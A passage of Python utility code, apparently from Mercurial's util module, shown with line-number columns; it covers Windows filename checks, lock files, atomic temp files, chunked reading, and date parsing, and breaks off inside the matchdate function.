1341 1343 return _("filename contains '%s', which is reserved "
1342 1344 "on Windows") % base
1343 1345 t = n[-1:]
1344 1346 if t in '. ' and n not in '..':
1345 1347 return _("filename ends with '%s', which is not allowed "
1346 1348 "on Windows") % t
1347 1349
1348 1350 if pycompat.osname == 'nt':
1349 1351 checkosfilename = checkwinfilename
1350 1352 timer = time.clock
1351 1353 else:
1352 1354 checkosfilename = platform.checkosfilename
1353 1355 timer = time.time
1354 1356
1355 1357 if safehasattr(time, "perf_counter"):
1356 1358 timer = time.perf_counter
1357 1359
1358 1360 def makelock(info, pathname):
1359 1361 try:
1360 1362 return os.symlink(info, pathname)
1361 1363 except OSError as why:
1362 1364 if why.errno == errno.EEXIST:
1363 1365 raise
1364 1366 except AttributeError: # no symlink in os
1365 1367 pass
1366 1368
1367 1369 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1368 1370 os.write(ld, info)
1369 1371 os.close(ld)
1370 1372
1371 1373 def readlock(pathname):
1372 1374 try:
1373 1375 return os.readlink(pathname)
1374 1376 except OSError as why:
1375 1377 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1376 1378 raise
1377 1379 except AttributeError: # no symlink in os
1378 1380 pass
1379 1381 fp = posixfile(pathname)
1380 1382 r = fp.read()
1381 1383 fp.close()
1382 1384 return r
1383 1385
1384 1386 def fstat(fp):
1385 1387 '''stat file object that may not have fileno method.'''
1386 1388 try:
1387 1389 return os.fstat(fp.fileno())
1388 1390 except AttributeError:
1389 1391 return os.stat(fp.name)
1390 1392
1391 1393 # File system features
1392 1394
1393 1395 def fscasesensitive(path):
1394 1396 """
1395 1397 Return true if the given path is on a case-sensitive filesystem
1396 1398
1397 1399 Requires a path (like /foo/.hg) ending with a foldable final
1398 1400 directory component.
1399 1401 """
1400 1402 s1 = os.lstat(path)
1401 1403 d, b = os.path.split(path)
1402 1404 b2 = b.upper()
1403 1405 if b == b2:
1404 1406 b2 = b.lower()
1405 1407 if b == b2:
1406 1408 return True # no evidence against case sensitivity
1407 1409 p2 = os.path.join(d, b2)
1408 1410 try:
1409 1411 s2 = os.lstat(p2)
1410 1412 if s2 == s1:
1411 1413 return False
1412 1414 return True
1413 1415 except OSError:
1414 1416 return True
1415 1417
1416 1418 try:
1417 1419 import re2
1418 1420 _re2 = None
1419 1421 except ImportError:
1420 1422 _re2 = False
1421 1423
1422 1424 class _re(object):
1423 1425 def _checkre2(self):
1424 1426 global _re2
1425 1427 try:
1426 1428 # check if match works, see issue3964
1427 1429 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1428 1430 except ImportError:
1429 1431 _re2 = False
1430 1432
1431 1433 def compile(self, pat, flags=0):
1432 1434 '''Compile a regular expression, using re2 if possible
1433 1435
1434 1436 For best performance, use only re2-compatible regexp features. The
1435 1437 only flags from the re module that are re2-compatible are
1436 1438 IGNORECASE and MULTILINE.'''
1437 1439 if _re2 is None:
1438 1440 self._checkre2()
1439 1441 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1440 1442 if flags & remod.IGNORECASE:
1441 1443 pat = '(?i)' + pat
1442 1444 if flags & remod.MULTILINE:
1443 1445 pat = '(?m)' + pat
1444 1446 try:
1445 1447 return re2.compile(pat)
1446 1448 except re2.error:
1447 1449 pass
1448 1450 return remod.compile(pat, flags)
1449 1451
1450 1452 @propertycache
1451 1453 def escape(self):
1452 1454 '''Return the version of escape corresponding to self.compile.
1453 1455
1454 1456 This is imperfect because whether re2 or re is used for a particular
1455 1457 function depends on the flags, etc, but it's the best we can do.
1456 1458 '''
1457 1459 global _re2
1458 1460 if _re2 is None:
1459 1461 self._checkre2()
1460 1462 if _re2:
1461 1463 return re2.escape
1462 1464 else:
1463 1465 return remod.escape
1464 1466
1465 1467 re = _re()
1466 1468
1467 1469 _fspathcache = {}
1468 1470 def fspath(name, root):
1469 1471 '''Get name in the case stored in the filesystem
1470 1472
1471 1473 The name should be relative to root, and be normcase-ed for efficiency.
1472 1474
1473 1475 Note that this function is unnecessary, and should not be
1474 1476 called, for case-sensitive filesystems (simply because it's expensive).
1475 1477
1476 1478 The root should be normcase-ed, too.
1477 1479 '''
1478 1480 def _makefspathcacheentry(dir):
1479 1481 return dict((normcase(n), n) for n in os.listdir(dir))
1480 1482
1481 1483 seps = pycompat.ossep
1482 1484 if pycompat.osaltsep:
1483 1485 seps = seps + pycompat.osaltsep
1484 1486 # Protect backslashes. This gets silly very quickly.
1485 1487 seps.replace('\\','\\\\')
1486 1488 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1487 1489 dir = os.path.normpath(root)
1488 1490 result = []
1489 1491 for part, sep in pattern.findall(name):
1490 1492 if sep:
1491 1493 result.append(sep)
1492 1494 continue
1493 1495
1494 1496 if dir not in _fspathcache:
1495 1497 _fspathcache[dir] = _makefspathcacheentry(dir)
1496 1498 contents = _fspathcache[dir]
1497 1499
1498 1500 found = contents.get(part)
1499 1501 if not found:
1500 1502 # retry "once per directory" per "dirstate.walk" which
1501 1503 # may take place for each patches of "hg qpush", for example
1502 1504 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1503 1505 found = contents.get(part)
1504 1506
1505 1507 result.append(found or part)
1506 1508 dir = os.path.join(dir, part)
1507 1509
1508 1510 return ''.join(result)
1509 1511
1510 1512 def getfstype(dirpath):
1511 1513 '''Get the filesystem type name from a directory (best-effort)
1512 1514
1513 1515 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1514 1516 '''
1515 1517 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1516 1518
1517 1519 def checknlink(testfile):
1518 1520 '''check whether hardlink count reporting works properly'''
1519 1521
1520 1522 # testfile may be open, so we need a separate file for checking to
1521 1523 # work around issue2543 (or testfile may get lost on Samba shares)
1522 1524 f1, f2, fp = None, None, None
1523 1525 try:
1524 1526 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1525 1527 suffix='1~', dir=os.path.dirname(testfile))
1526 1528 os.close(fd)
1527 1529 f2 = '%s2~' % f1[:-2]
1528 1530
1529 1531 oslink(f1, f2)
1530 1532 # nlinks() may behave differently for files on Windows shares if
1531 1533 # the file is open.
1532 1534 fp = posixfile(f2)
1533 1535 return nlinks(f2) > 1
1534 1536 except OSError:
1535 1537 return False
1536 1538 finally:
1537 1539 if fp is not None:
1538 1540 fp.close()
1539 1541 for f in (f1, f2):
1540 1542 try:
1541 1543 if f is not None:
1542 1544 os.unlink(f)
1543 1545 except OSError:
1544 1546 pass
1545 1547
1546 1548 def endswithsep(path):
1547 1549 '''Check path ends with os.sep or os.altsep.'''
1548 1550 return (path.endswith(pycompat.ossep)
1549 1551 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1550 1552
1551 1553 def splitpath(path):
1552 1554 '''Split path by os.sep.
1553 1555 Note that this function does not use os.altsep because this is
1554 1556 an alternative of simple "xxx.split(os.sep)".
1555 1557 It is recommended to use os.path.normpath() before using this
1556 1558 function if need.'''
1557 1559 return path.split(pycompat.ossep)
1558 1560
1559 1561 def gui():
1560 1562 '''Are we running in a GUI?'''
1561 1563 if pycompat.sysplatform == 'darwin':
1562 1564 if 'SSH_CONNECTION' in encoding.environ:
1563 1565 # handle SSH access to a box where the user is logged in
1564 1566 return False
1565 1567 elif getattr(osutil, 'isgui', None):
1566 1568 # check if a CoreGraphics session is available
1567 1569 return osutil.isgui()
1568 1570 else:
1569 1571 # pure build; use a safe default
1570 1572 return True
1571 1573 else:
1572 1574 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1573 1575
1574 1576 def mktempcopy(name, emptyok=False, createmode=None):
1575 1577 """Create a temporary file with the same contents from name
1576 1578
1577 1579 The permission bits are copied from the original file.
1578 1580
1579 1581 If the temporary file is going to be truncated immediately, you
1580 1582 can use emptyok=True as an optimization.
1581 1583
1582 1584 Returns the name of the temporary file.
1583 1585 """
1584 1586 d, fn = os.path.split(name)
1585 1587 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1586 1588 os.close(fd)
1587 1589 # Temporary files are created with mode 0600, which is usually not
1588 1590 # what we want. If the original file already exists, just copy
1589 1591 # its mode. Otherwise, manually obey umask.
1590 1592 copymode(name, temp, createmode)
1591 1593 if emptyok:
1592 1594 return temp
1593 1595 try:
1594 1596 try:
1595 1597 ifp = posixfile(name, "rb")
1596 1598 except IOError as inst:
1597 1599 if inst.errno == errno.ENOENT:
1598 1600 return temp
1599 1601 if not getattr(inst, 'filename', None):
1600 1602 inst.filename = name
1601 1603 raise
1602 1604 ofp = posixfile(temp, "wb")
1603 1605 for chunk in filechunkiter(ifp):
1604 1606 ofp.write(chunk)
1605 1607 ifp.close()
1606 1608 ofp.close()
1607 1609 except: # re-raises
1608 1610 try:
1609 1611 os.unlink(temp)
1610 1612 except OSError:
1611 1613 pass
1612 1614 raise
1613 1615 return temp
1614 1616
1615 1617 class filestat(object):
1616 1618 """help to exactly detect change of a file
1617 1619
1618 1620 'stat' attribute is result of 'os.stat()' if specified 'path'
1619 1621 exists. Otherwise, it is None. This can avoid preparative
1620 1622 'exists()' examination on client side of this class.
1621 1623 """
1622 1624 def __init__(self, stat):
1623 1625 self.stat = stat
1624 1626
1625 1627 @classmethod
1626 1628 def frompath(cls, path):
1627 1629 try:
1628 1630 stat = os.stat(path)
1629 1631 except OSError as err:
1630 1632 if err.errno != errno.ENOENT:
1631 1633 raise
1632 1634 stat = None
1633 1635 return cls(stat)
1634 1636
1635 1637 @classmethod
1636 1638 def fromfp(cls, fp):
1637 1639 stat = os.fstat(fp.fileno())
1638 1640 return cls(stat)
1639 1641
1640 1642 __hash__ = object.__hash__
1641 1643
1642 1644 def __eq__(self, old):
1643 1645 try:
1644 1646 # if ambiguity between stat of new and old file is
1645 1647 # avoided, comparison of size, ctime and mtime is enough
1646 1648 # to exactly detect change of a file regardless of platform
1647 1649 return (self.stat.st_size == old.stat.st_size and
1648 1650 self.stat.st_ctime == old.stat.st_ctime and
1649 1651 self.stat.st_mtime == old.stat.st_mtime)
1650 1652 except AttributeError:
1651 1653 pass
1652 1654 try:
1653 1655 return self.stat is None and old.stat is None
1654 1656 except AttributeError:
1655 1657 return False
1656 1658
1657 1659 def isambig(self, old):
1658 1660 """Examine whether new (= self) stat is ambiguous against old one
1659 1661
1660 1662 "S[N]" below means stat of a file at N-th change:
1661 1663
1662 1664 - S[n-1].ctime < S[n].ctime: can detect change of a file
1663 1665 - S[n-1].ctime == S[n].ctime
1664 1666 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1665 1667 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1666 1668 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1667 1669 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1668 1670
1669 1671 Case (*2) above means that a file was changed twice or more at
1670 1672 same time in sec (= S[n-1].ctime), and comparison of timestamp
1671 1673 is ambiguous.
1672 1674
1673 1675 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1674 1676 timestamp is ambiguous".
1675 1677
1676 1678 But advancing mtime only in case (*2) doesn't work as
1677 1679 expected, because naturally advanced S[n].mtime in case (*1)
1678 1680 might be equal to manually advanced S[n-1 or earlier].mtime.
1679 1681
1680 1682 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1681 1683 treated as ambiguous regardless of mtime, to avoid overlooking
1682 1684 by confliction between such mtime.
1683 1685
1684 1686 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1685 1687 S[n].mtime", even if size of a file isn't changed.
1686 1688 """
1687 1689 try:
1688 1690 return (self.stat.st_ctime == old.stat.st_ctime)
1689 1691 except AttributeError:
1690 1692 return False
1691 1693
1692 1694 def avoidambig(self, path, old):
1693 1695 """Change file stat of specified path to avoid ambiguity
1694 1696
1695 1697 'old' should be previous filestat of 'path'.
1696 1698
1697 1699 This skips avoiding ambiguity, if a process doesn't have
1698 1700 appropriate privileges for 'path'. This returns False in this
1699 1701 case.
1700 1702
1701 1703 Otherwise, this returns True, as "ambiguity is avoided".
1702 1704 """
1703 1705 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1704 1706 try:
1705 1707 os.utime(path, (advanced, advanced))
1706 1708 except OSError as inst:
1707 1709 if inst.errno == errno.EPERM:
1708 1710 # utime() on the file created by another user causes EPERM,
1709 1711 # if a process doesn't have appropriate privileges
1710 1712 return False
1711 1713 raise
1712 1714 return True
1713 1715
1714 1716 def __ne__(self, other):
1715 1717 return not self == other
1716 1718
1717 1719 class atomictempfile(object):
1718 1720 '''writable file object that atomically updates a file
1719 1721
1720 1722 All writes will go to a temporary copy of the original file. Call
1721 1723 close() when you are done writing, and atomictempfile will rename
1722 1724 the temporary copy to the original name, making the changes
1723 1725 visible. If the object is destroyed without being closed, all your
1724 1726 writes are discarded.
1725 1727
1726 1728 checkambig argument of constructor is used with filestat, and is
1727 1729 useful only if target file is guarded by any lock (e.g. repo.lock
1728 1730 or repo.wlock).
1729 1731 '''
1730 1732 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1731 1733 self.__name = name # permanent name
1732 1734 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1733 1735 createmode=createmode)
1734 1736 self._fp = posixfile(self._tempname, mode)
1735 1737 self._checkambig = checkambig
1736 1738
1737 1739 # delegated methods
1738 1740 self.read = self._fp.read
1739 1741 self.write = self._fp.write
1740 1742 self.seek = self._fp.seek
1741 1743 self.tell = self._fp.tell
1742 1744 self.fileno = self._fp.fileno
1743 1745
1744 1746 def close(self):
1745 1747 if not self._fp.closed:
1746 1748 self._fp.close()
1747 1749 filename = localpath(self.__name)
1748 1750 oldstat = self._checkambig and filestat.frompath(filename)
1749 1751 if oldstat and oldstat.stat:
1750 1752 rename(self._tempname, filename)
1751 1753 newstat = filestat.frompath(filename)
1752 1754 if newstat.isambig(oldstat):
1753 1755 # stat of changed file is ambiguous to original one
1754 1756 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1755 1757 os.utime(filename, (advanced, advanced))
1756 1758 else:
1757 1759 rename(self._tempname, filename)
1758 1760
1759 1761 def discard(self):
1760 1762 if not self._fp.closed:
1761 1763 try:
1762 1764 os.unlink(self._tempname)
1763 1765 except OSError:
1764 1766 pass
1765 1767 self._fp.close()
1766 1768
1767 1769 def __del__(self):
1768 1770 if safehasattr(self, '_fp'): # constructor actually did something
1769 1771 self.discard()
1770 1772
1771 1773 def __enter__(self):
1772 1774 return self
1773 1775
1774 1776 def __exit__(self, exctype, excvalue, traceback):
1775 1777 if exctype is not None:
1776 1778 self.discard()
1777 1779 else:
1778 1780 self.close()
1779 1781
1780 1782 def unlinkpath(f, ignoremissing=False):
1781 1783 """unlink and remove the directory if it is empty"""
1782 1784 if ignoremissing:
1783 1785 tryunlink(f)
1784 1786 else:
1785 1787 unlink(f)
1786 1788 # try removing directories that might now be empty
1787 1789 try:
1788 1790 removedirs(os.path.dirname(f))
1789 1791 except OSError:
1790 1792 pass
1791 1793
1792 1794 def tryunlink(f):
1793 1795 """Attempt to remove a file, ignoring ENOENT errors."""
1794 1796 try:
1795 1797 unlink(f)
1796 1798 except OSError as e:
1797 1799 if e.errno != errno.ENOENT:
1798 1800 raise
1799 1801
1800 1802 def makedirs(name, mode=None, notindexed=False):
1801 1803 """recursive directory creation with parent mode inheritance
1802 1804
1803 1805 Newly created directories are marked as "not to be indexed by
1804 1806 the content indexing service", if ``notindexed`` is specified
1805 1807 for "write" mode access.
1806 1808 """
1807 1809 try:
1808 1810 makedir(name, notindexed)
1809 1811 except OSError as err:
1810 1812 if err.errno == errno.EEXIST:
1811 1813 return
1812 1814 if err.errno != errno.ENOENT or not name:
1813 1815 raise
1814 1816 parent = os.path.dirname(os.path.abspath(name))
1815 1817 if parent == name:
1816 1818 raise
1817 1819 makedirs(parent, mode, notindexed)
1818 1820 try:
1819 1821 makedir(name, notindexed)
1820 1822 except OSError as err:
1821 1823 # Catch EEXIST to handle races
1822 1824 if err.errno == errno.EEXIST:
1823 1825 return
1824 1826 raise
1825 1827 if mode is not None:
1826 1828 os.chmod(name, mode)
1827 1829
1828 1830 def readfile(path):
1829 1831 with open(path, 'rb') as fp:
1830 1832 return fp.read()
1831 1833
1832 1834 def writefile(path, text):
1833 1835 with open(path, 'wb') as fp:
1834 1836 fp.write(text)
1835 1837
1836 1838 def appendfile(path, text):
1837 1839 with open(path, 'ab') as fp:
1838 1840 fp.write(text)
1839 1841
1840 1842 class chunkbuffer(object):
1841 1843 """Allow arbitrary sized chunks of data to be efficiently read from an
1842 1844 iterator over chunks of arbitrary size."""
1843 1845
1844 1846 def __init__(self, in_iter):
1845 1847 """in_iter is the iterator that's iterating over the input chunks."""
1846 1848 def splitbig(chunks):
1847 1849 for chunk in chunks:
1848 1850 if len(chunk) > 2**20:
1849 1851 pos = 0
1850 1852 while pos < len(chunk):
1851 1853 end = pos + 2 ** 18
1852 1854 yield chunk[pos:end]
1853 1855 pos = end
1854 1856 else:
1855 1857 yield chunk
1856 1858 self.iter = splitbig(in_iter)
1857 1859 self._queue = collections.deque()
1858 1860 self._chunkoffset = 0
1859 1861
1860 1862 def read(self, l=None):
1861 1863 """Read L bytes of data from the iterator of chunks of data.
1862 1864 Returns less than L bytes if the iterator runs dry.
1863 1865
1864 1866 If size parameter is omitted, read everything"""
1865 1867 if l is None:
1866 1868 return ''.join(self.iter)
1867 1869
1868 1870 left = l
1869 1871 buf = []
1870 1872 queue = self._queue
1871 1873 while left > 0:
1872 1874 # refill the queue
1873 1875 if not queue:
1874 1876 target = 2**18
1875 1877 for chunk in self.iter:
1876 1878 queue.append(chunk)
1877 1879 target -= len(chunk)
1878 1880 if target <= 0:
1879 1881 break
1880 1882 if not queue:
1881 1883 break
1882 1884
1883 1885 # The easy way to do this would be to queue.popleft(), modify the
1884 1886 # chunk (if necessary), then queue.appendleft(). However, for cases
1885 1887 # where we read partial chunk content, this incurs 2 dequeue
1886 1888 # mutations and creates a new str for the remaining chunk in the
1887 1889 # queue. Our code below avoids this overhead.
1888 1890
1889 1891 chunk = queue[0]
1890 1892 chunkl = len(chunk)
1891 1893 offset = self._chunkoffset
1892 1894
1893 1895 # Use full chunk.
1894 1896 if offset == 0 and left >= chunkl:
1895 1897 left -= chunkl
1896 1898 queue.popleft()
1897 1899 buf.append(chunk)
1898 1900 # self._chunkoffset remains at 0.
1899 1901 continue
1900 1902
1901 1903 chunkremaining = chunkl - offset
1902 1904
1903 1905 # Use all of unconsumed part of chunk.
1904 1906 if left >= chunkremaining:
1905 1907 left -= chunkremaining
1906 1908 queue.popleft()
1907 1909 # offset == 0 is enabled by block above, so this won't merely
1908 1910 # copy via ``chunk[0:]``.
1909 1911 buf.append(chunk[offset:])
1910 1912 self._chunkoffset = 0
1911 1913
1912 1914 # Partial chunk needed.
1913 1915 else:
1914 1916 buf.append(chunk[offset:offset + left])
1915 1917 self._chunkoffset += left
1916 1918 left -= chunkremaining
1917 1919
1918 1920 return ''.join(buf)
1919 1921
1920 1922 def filechunkiter(f, size=131072, limit=None):
1921 1923 """Create a generator that produces the data in the file size
1922 1924 (default 131072) bytes at a time, up to optional limit (default is
1923 1925 to read all data). Chunks may be less than size bytes if the
1924 1926 chunk is the last chunk in the file, or the file is a socket or
1925 1927 some other type of file that sometimes reads less data than is
1926 1928 requested."""
1927 1929 assert size >= 0
1928 1930 assert limit is None or limit >= 0
1929 1931 while True:
1930 1932 if limit is None:
1931 1933 nbytes = size
1932 1934 else:
1933 1935 nbytes = min(limit, size)
1934 1936 s = nbytes and f.read(nbytes)
1935 1937 if not s:
1936 1938 break
1937 1939 if limit:
1938 1940 limit -= len(s)
1939 1941 yield s
1940 1942
1941 1943 def makedate(timestamp=None):
1942 1944 '''Return a unix timestamp (or the current time) as a (unixtime,
1943 1945 offset) tuple based off the local timezone.'''
1944 1946 if timestamp is None:
1945 1947 timestamp = time.time()
1946 1948 if timestamp < 0:
1947 1949 hint = _("check your clock")
1948 1950 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1949 1951 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1950 1952 datetime.datetime.fromtimestamp(timestamp))
1951 1953 tz = delta.days * 86400 + delta.seconds
1952 1954 return timestamp, tz
1953 1955
1954 1956 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1955 1957 """represent a (unixtime, offset) tuple as a localized time.
1956 1958 unixtime is seconds since the epoch, and offset is the time zone's
1957 1959 number of seconds away from UTC.
1958 1960
1959 1961 >>> datestr((0, 0))
1960 1962 'Thu Jan 01 00:00:00 1970 +0000'
1961 1963 >>> datestr((42, 0))
1962 1964 'Thu Jan 01 00:00:42 1970 +0000'
1963 1965 >>> datestr((-42, 0))
1964 1966 'Wed Dec 31 23:59:18 1969 +0000'
1965 1967 >>> datestr((0x7fffffff, 0))
1966 1968 'Tue Jan 19 03:14:07 2038 +0000'
1967 1969 >>> datestr((-0x80000000, 0))
1968 1970 'Fri Dec 13 20:45:52 1901 +0000'
1969 1971 """
1970 1972 t, tz = date or makedate()
1971 1973 if "%1" in format or "%2" in format or "%z" in format:
1972 1974 sign = (tz > 0) and "-" or "+"
1973 1975 minutes = abs(tz) // 60
1974 1976 q, r = divmod(minutes, 60)
1975 1977 format = format.replace("%z", "%1%2")
1976 1978 format = format.replace("%1", "%c%02d" % (sign, q))
1977 1979 format = format.replace("%2", "%02d" % r)
1978 1980 d = t - tz
1979 1981 if d > 0x7fffffff:
1980 1982 d = 0x7fffffff
1981 1983 elif d < -0x80000000:
1982 1984 d = -0x80000000
1983 1985 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1984 1986 # because they use the gmtime() system call which is buggy on Windows
1985 1987 # for negative values.
1986 1988 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1987 1989 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1988 1990 return s
1989 1991
1990 1992 def shortdate(date=None):
1991 1993 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1992 1994 return datestr(date, format='%Y-%m-%d')
1993 1995
1994 1996 def parsetimezone(s):
1995 1997 """find a trailing timezone, if any, in string, and return a
1996 1998 (offset, remainder) pair"""
1997 1999
1998 2000 if s.endswith("GMT") or s.endswith("UTC"):
1999 2001 return 0, s[:-3].rstrip()
2000 2002
2001 2003 # Unix-style timezones [+-]hhmm
2002 2004 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2003 2005 sign = (s[-5] == "+") and 1 or -1
2004 2006 hours = int(s[-4:-2])
2005 2007 minutes = int(s[-2:])
2006 2008 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2007 2009
2008 2010 # ISO8601 trailing Z
2009 2011 if s.endswith("Z") and s[-2:-1].isdigit():
2010 2012 return 0, s[:-1]
2011 2013
2012 2014 # ISO8601-style [+-]hh:mm
2013 2015 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2014 2016 s[-5:-3].isdigit() and s[-2:].isdigit()):
2015 2017 sign = (s[-6] == "+") and 1 or -1
2016 2018 hours = int(s[-5:-3])
2017 2019 minutes = int(s[-2:])
2018 2020 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2019 2021
2020 2022 return None, s
2021 2023
2022 2024 def strdate(string, format, defaults=None):
2023 2025 """parse a localized time string and return a (unixtime, offset) tuple.
2024 2026 if the string cannot be parsed, ValueError is raised."""
2025 2027 if defaults is None:
2026 2028 defaults = {}
2027 2029
2028 2030 # NOTE: unixtime = localunixtime + offset
2029 2031 offset, date = parsetimezone(string)
2030 2032
2031 2033 # add missing elements from defaults
2032 2034 usenow = False # default to using biased defaults
2033 2035 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2034 2036 part = pycompat.bytestr(part)
2035 2037 found = [True for p in part if ("%"+p) in format]
2036 2038 if not found:
2037 2039 date += "@" + defaults[part][usenow]
2038 2040 format += "@%" + part[0]
2039 2041 else:
2040 2042 # We've found a specific time element, less specific time
2041 2043 # elements are relative to today
2042 2044 usenow = True
2043 2045
2044 2046 timetuple = time.strptime(encoding.strfromlocal(date),
2045 2047 encoding.strfromlocal(format))
2046 2048 localunixtime = int(calendar.timegm(timetuple))
2047 2049 if offset is None:
2048 2050 # local timezone
2049 2051 unixtime = int(time.mktime(timetuple))
2050 2052 offset = unixtime - localunixtime
2051 2053 else:
2052 2054 unixtime = localunixtime + offset
2053 2055 return unixtime, offset
2054 2056
2055 2057 def parsedate(date, formats=None, bias=None):
2056 2058 """parse a localized date/time and return a (unixtime, offset) tuple.
2057 2059
2058 2060 The date may be a "unixtime offset" string or in one of the specified
2059 2061 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2060 2062
2061 2063 >>> parsedate(b' today ') == parsedate(
2062 2064 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2063 2065 True
2064 2066 >>> parsedate(b'yesterday ') == parsedate(
2065 2067 ... (datetime.date.today() - datetime.timedelta(days=1)
2066 2068 ... ).strftime('%b %d').encode('ascii'))
2067 2069 True
2068 2070 >>> now, tz = makedate()
2069 2071 >>> strnow, strtz = parsedate(b'now')
2070 2072 >>> (strnow - now) < 1
2071 2073 True
2072 2074 >>> tz == strtz
2073 2075 True
2074 2076 """
2075 2077 if bias is None:
2076 2078 bias = {}
2077 2079 if not date:
2078 2080 return 0, 0
2079 2081 if isinstance(date, tuple) and len(date) == 2:
2080 2082 return date
2081 2083 if not formats:
2082 2084 formats = defaultdateformats
2083 2085 date = date.strip()
2084 2086
2085 2087 if date == 'now' or date == _('now'):
2086 2088 return makedate()
2087 2089 if date == 'today' or date == _('today'):
2088 2090 date = datetime.date.today().strftime(r'%b %d')
2089 2091 date = encoding.strtolocal(date)
2090 2092 elif date == 'yesterday' or date == _('yesterday'):
2091 2093 date = (datetime.date.today() -
2092 2094 datetime.timedelta(days=1)).strftime(r'%b %d')
2093 2095 date = encoding.strtolocal(date)
2094 2096
2095 2097 try:
2096 2098 when, offset = map(int, date.split(' '))
2097 2099 except ValueError:
2098 2100 # fill out defaults
2099 2101 now = makedate()
2100 2102 defaults = {}
2101 2103 for part in ("d", "mb", "yY", "HI", "M", "S"):
2102 2104 # this piece is for rounding the specific end of unknowns
2103 2105 b = bias.get(part)
2104 2106 if b is None:
2105 2107 if part[0:1] in "HMS":
2106 2108 b = "00"
2107 2109 else:
2108 2110 b = "0"
2109 2111
2110 2112 # this piece is for matching the generic end to today's date
2111 2113 n = datestr(now, "%" + part[0:1])
2112 2114
2113 2115 defaults[part] = (b, n)
2114 2116
2115 2117 for format in formats:
2116 2118 try:
2117 2119 when, offset = strdate(date, format, defaults)
2118 2120 except (ValueError, OverflowError):
2119 2121 pass
2120 2122 else:
2121 2123 break
2122 2124 else:
2123 2125 raise error.ParseError(_('invalid date: %r') % date)
2124 2126 # validate explicit (probably user-specified) date and
2125 2127 # time zone offset. values must fit in signed 32 bits for
2126 2128 # current 32-bit linux runtimes. timezones go from UTC-12
2127 2129 # to UTC+14
2128 2130 if when < -0x80000000 or when > 0x7fffffff:
2129 2131 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2130 2132 if offset < -50400 or offset > 43200:
2131 2133 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2132 2134 return when, offset
2133 2135
2134 2136 def matchdate(date):
2135 2137 """Return a function that matches a given date match specifier
2136 2138
2137 2139 Formats include:
2138 2140
2139 2141 '{date}' match a given date to the accuracy provided
2140 2142
2141 2143 '<{date}' on or before a given date
2142 2144
2143 2145 '>{date}' on or after a given date
2144 2146
2145 2147 >>> p1 = parsedate(b"10:29:59")
2146 2148 >>> p2 = parsedate(b"10:30:00")
2147 2149 >>> p3 = parsedate(b"10:30:59")
2148 2150 >>> p4 = parsedate(b"10:31:00")
2149 2151 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2150 2152 >>> f = matchdate(b"10:30")
2151 2153 >>> f(p1[0])
2152 2154 False
2153 2155 >>> f(p2[0])
2154 2156 True
2155 2157 >>> f(p3[0])
2156 2158 True
2157 2159 >>> f(p4[0])
2158 2160 False
2159 2161 >>> f(p5[0])
2160 2162 False
2161 2163 """
2162 2164
2163 2165 def lower(date):
2164 2166 d = {'mb': "1", 'd': "1"}
2165 2167 return parsedate(date, extendeddateformats, d)[0]
2166 2168
2167 2169 def upper(date):
2168 2170 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2169 2171 for days in ("31", "30", "29"):
2170 2172 try:
2171 2173 d["d"] = days
2172 2174 return parsedate(date, extendeddateformats, d)[0]
2173 2175 except Abort:
2174 2176 pass
2175 2177 d["d"] = "28"
2176 2178 return parsedate(date, extendeddateformats, d)[0]
2177 2179
2178 2180 date = date.strip()
2179 2181
2180 2182 if not date:
2181 2183 raise Abort(_("dates cannot consist entirely of whitespace"))
2182 2184 elif date[0] == "<":
2183 2185 if not date[1:]:
2184 2186 raise Abort(_("invalid day spec, use '<DATE'"))
2185 2187 when = upper(date[1:])
2186 2188 return lambda x: x <= when
2187 2189 elif date[0] == ">":
2188 2190 if not date[1:]:
2189 2191 raise Abort(_("invalid day spec, use '>DATE'"))
2190 2192 when = lower(date[1:])
2191 2193 return lambda x: x >= when
2192 2194 elif date[0] == "-":
2193 2195 try:
2194 2196 days = int(date[1:])
2195 2197 except ValueError:
2196 2198 raise Abort(_("invalid day spec: %s") % date[1:])
2197 2199 if days < 0:
2198 2200 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2199 2201 % date[1:])
2200 2202 when = makedate()[0] - days * 3600 * 24
2201 2203 return lambda x: x >= when
2202 2204 elif " to " in date:
2203 2205 a, b = date.split(" to ")
